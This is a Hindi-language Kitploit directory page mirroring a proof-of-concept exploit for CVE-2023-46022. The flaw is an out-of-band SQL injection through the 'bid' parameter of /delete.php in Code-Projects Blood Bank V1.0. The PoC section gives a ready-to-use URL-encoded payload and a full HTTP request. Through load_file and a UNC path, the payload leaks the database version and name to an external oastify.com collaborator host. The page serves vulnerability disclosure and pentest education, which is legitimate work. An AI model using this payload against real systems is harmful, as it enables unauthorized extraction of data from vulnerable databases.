Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability — CVE-2023-46022 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Code-Projects Blood Bank V1.0 में 'bid' पैरामीटर के माध्यम से Out-of-Band SQL इंजेक्शन प्रदर्शित करता है, जिससे Burp Collaborator के जरिए डेटाबेस संस्करण और डेटा निष्कर्षण संभव होता है। | Kitploit
उपकरण/GitHubGitHub/ersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

CVE-2023-46022 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Code-Projects Blood Bank V1.0 में 'bid' पैरामीटर के माध्यम से Out-of-Band SQL इंजेक्शन प्रदर्शित करता है, जिससे Burp Collaborator के जरिए डेटाबेस संस्करण और डेटा निष्कर्षण संभव होता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

  • एक्सप्लॉइट लेखक: ersinerenler

विक्रेता होमपेज

  • https://code-projects.org/blood-bank-in-php-with-source-code

सॉफ्टवेयर लिंक

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

अवलोकन

  • Code-Projects Blood Bank V1.0, /delete.php फ़ाइल में 'bid' पैरामीटर के माध्यम से आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन से संबंधित एक गंभीर सुरक्षा भेद्यता के संपर्क में है। यह भेद्यता उचित सुरक्षा तंत्र की कमी के कारण उत्पन्न होती है, जिससे हमलावर पैरामीटर का दुरुपयोग कर सकते हैं और Burp Collaborator के माध्यम से OOB SQL इंजेक्शन हमले कर सकते हैं। इसके परिणामस्वरूप अनधिकृत पहुंच और डेटाबेस से संवेदनशील जानकारी का निष्कर्षण हो सकता है।

भेद्यता विवरण

  • CVE आईडी: CVE-2023-46022
  • प्रभावित संस्करण: Blood Bank V1.0
  • भेद्य फ़ाइल: /delete.php
  • पैरामीटर नाम: bid
  • हमले का प्रकार: स्थानीय

संदर्भ:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46022
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46022

विवरण

  • Code-Projects Blood Bank V1.0 के /delete.php फ़ाइल में 'bid' पैरामीटर आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन के प्रति संवेदनशील है। यह भेद्यता अपर्याप्त सुरक्षा तंत्र के कारण उत्पन्न होती है, जिससे हमलावर OOB SQL इंजेक्शन हमले शुरू करने के लिए Burp Collaborator का उपयोग करके पैरामीटर का शोषण कर सकते हैं। इस तकनीक के माध्यम से, एक हमलावर डेटाबेस से संवेदनशील जानकारी निकाल सकता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC) :

  • Burp Suite के माध्यम से delete.php के अनुरोध को इंटरसेप्ट करें
  • पेलोड को भेद्य पैरामीटर में इंजेक्ट करें
  • पेलोड: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
  • bid पैरामीटर के लिए उदाहरण अनुरोध
root@kitploit:~
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.cuaxacpnxbay7ss8o3csf4bkwb22qtei.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
  • डेटाबेस और संस्करण की जानकारी Burp Suite Collaborator के माध्यम से प्राप्त की गई
छवि
टूल डाउनलोड करें